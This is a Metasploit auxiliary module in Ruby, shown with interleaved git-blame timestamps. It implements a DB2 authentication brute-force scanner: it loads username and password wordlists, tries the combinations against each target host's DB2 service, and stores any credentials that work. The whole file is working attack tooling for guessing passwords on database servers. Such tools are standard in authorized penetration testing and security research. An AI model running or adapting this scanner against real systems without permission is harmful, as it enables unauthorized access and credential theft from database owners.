2010-01-25 15:58:24 +00:00
|
|
|
##
|
2014-10-17 16:47:33 +00:00
|
|
|
# This module requires Metasploit: http://metasploit.com/download
|
2013-10-15 18:50:46 +00:00
|
|
|
# Current source: https://github.com/rapid7/metasploit-framework
|
2010-01-25 15:58:24 +00:00
|
|
|
##
|
|
|
|
|
|
|
|
|
|
|
|
require 'msf/core'
|
2014-06-10 18:43:07 +00:00
|
|
|
require 'metasploit/framework/credential_collection'
|
|
|
|
require 'metasploit/framework/login_scanner/db2'
|
2010-01-25 15:58:24 +00:00
|
|
|
|
2016-03-08 13:02:44 +00:00
|
|
|
class MetasploitModule < Msf::Auxiliary
|
2010-04-30 08:40:19 +00:00
|
|
|
|
2013-08-30 21:28:54 +00:00
|
|
|
include Msf::Exploit::Remote::DB2
|
|
|
|
include Msf::Auxiliary::AuthBrute
|
|
|
|
include Msf::Auxiliary::Scanner
|
|
|
|
include Msf::Auxiliary::Report
|
2010-04-30 08:40:19 +00:00
|
|
|
|
2013-08-30 21:28:54 +00:00
|
|
|
def initialize
|
|
|
|
super(
|
|
|
|
'Name' => 'DB2 Authentication Brute Force Utility',
|
|
|
|
'Description' => %q{This module attempts to authenticate against a DB2
|
|
|
|
instance using username and password combinations indicated by the
|
|
|
|
USER_FILE, PASS_FILE, and USERPASS_FILE options.},
|
|
|
|
'Author' => ['todb'],
|
|
|
|
'References' =>
|
|
|
|
[
|
|
|
|
[ 'CVE', '1999-0502'] # Weak password
|
|
|
|
],
|
|
|
|
'License' => MSF_LICENSE
|
|
|
|
)
|
2010-04-30 08:40:19 +00:00
|
|
|
|
2013-08-30 21:28:54 +00:00
|
|
|
register_options(
|
|
|
|
[
|
2014-10-21 20:39:24 +00:00
|
|
|
Opt::Proxies,
|
2013-08-30 21:28:54 +00:00
|
|
|
OptPath.new('USERPASS_FILE', [ false, "File containing (space-seperated) users and passwords, one pair per line",
|
2013-09-26 19:34:48 +00:00
|
|
|
File.join(Msf::Config.data_directory, "wordlists", "db2_default_userpass.txt") ]),
|
2013-08-30 21:28:54 +00:00
|
|
|
OptPath.new('USER_FILE', [ false, "File containing users, one per line",
|
2013-09-26 19:34:48 +00:00
|
|
|
File.join(Msf::Config.data_directory, "wordlists", "db2_default_user.txt") ]),
|
2013-08-30 21:28:54 +00:00
|
|
|
OptPath.new('PASS_FILE', [ false, "File containing passwords, one per line",
|
2013-09-26 19:34:48 +00:00
|
|
|
File.join(Msf::Config.data_directory, "wordlists", "db2_default_pass.txt") ]),
|
2013-08-30 21:28:54 +00:00
|
|
|
], self.class)
|
|
|
|
end
|
2010-01-25 15:58:24 +00:00
|
|
|
|
2013-08-30 21:28:54 +00:00
|
|
|
def run_host(ip)
|
2014-06-10 18:43:07 +00:00
|
|
|
cred_collection = Metasploit::Framework::CredentialCollection.new(
|
|
|
|
blank_passwords: datastore['BLANK_PASSWORDS'],
|
|
|
|
pass_file: datastore['PASS_FILE'],
|
|
|
|
password: datastore['PASSWORD'],
|
|
|
|
user_file: datastore['USER_FILE'],
|
|
|
|
userpass_file: datastore['USERPASS_FILE'],
|
|
|
|
username: datastore['USERNAME'],
|
|
|
|
user_as_pass: datastore['USER_AS_PASS'],
|
|
|
|
realm: datastore['DATABASE']
|
|
|
|
)
|
|
|
|
|
2014-09-04 17:32:35 +00:00
|
|
|
cred_collection = prepend_db_passwords(cred_collection)
|
|
|
|
|
2014-06-10 18:43:07 +00:00
|
|
|
scanner = Metasploit::Framework::LoginScanner::DB2.new(
|
|
|
|
host: ip,
|
|
|
|
port: rport,
|
|
|
|
proxies: datastore['PROXIES'],
|
|
|
|
cred_details: cred_collection,
|
|
|
|
stop_on_success: datastore['STOP_ON_SUCCESS'],
|
2014-12-11 17:06:32 +00:00
|
|
|
bruteforce_speed: datastore['BRUTEFORCE_SPEED'],
|
2014-10-21 23:29:35 +00:00
|
|
|
connection_timeout: 30,
|
|
|
|
max_send_size: datastore['TCP::max_send_size'],
|
|
|
|
send_delay: datastore['TCP::send_delay'],
|
2015-02-07 17:50:30 +00:00
|
|
|
framework: framework,
|
|
|
|
framework_module: self,
|
2015-09-28 19:10:55 +00:00
|
|
|
ssl: datastore['SSL'],
|
|
|
|
ssl_version: datastore['SSLVersion'],
|
|
|
|
ssl_verify_mode: datastore['SSLVerifyMode'],
|
|
|
|
ssl_cipher: datastore['SSLCipher'],
|
|
|
|
local_port: datastore['CPORT'],
|
|
|
|
local_host: datastore['CHOST']
|
2014-06-10 18:43:07 +00:00
|
|
|
)
|
|
|
|
|
|
|
|
scanner.scan! do |result|
|
2014-08-01 18:00:27 +00:00
|
|
|
credential_data = result.to_h
|
|
|
|
credential_data.merge!(
|
|
|
|
module_fullname: self.fullname,
|
|
|
|
workspace_id: myworkspace_id
|
|
|
|
)
|
2014-06-10 18:43:07 +00:00
|
|
|
if result.success?
|
|
|
|
credential_core = create_credential(credential_data)
|
2014-08-01 18:00:27 +00:00
|
|
|
credential_data[:core] = credential_core
|
|
|
|
create_credential_login(credential_data)
|
2010-02-08 18:54:50 +00:00
|
|
|
|
2014-06-10 18:43:07 +00:00
|
|
|
print_good "#{ip}:#{rport} - LOGIN SUCCESSFUL: #{result.credential}"
|
|
|
|
else
|
2014-08-01 18:00:27 +00:00
|
|
|
invalidate_login(credential_data)
|
2014-10-11 16:11:09 +00:00
|
|
|
vprint_error "#{ip}:#{rport} - LOGIN FAILED: #{result.credential} (#{result.status}: #{result.proof})"
|
2014-06-10 18:43:07 +00:00
|
|
|
end
|
2013-08-30 21:28:54 +00:00
|
|
|
end
|
|
|
|
end
|
2014-06-10 18:43:07 +00:00
|
|
|
|
2010-01-25 15:58:24 +00:00
|
|
|
end
|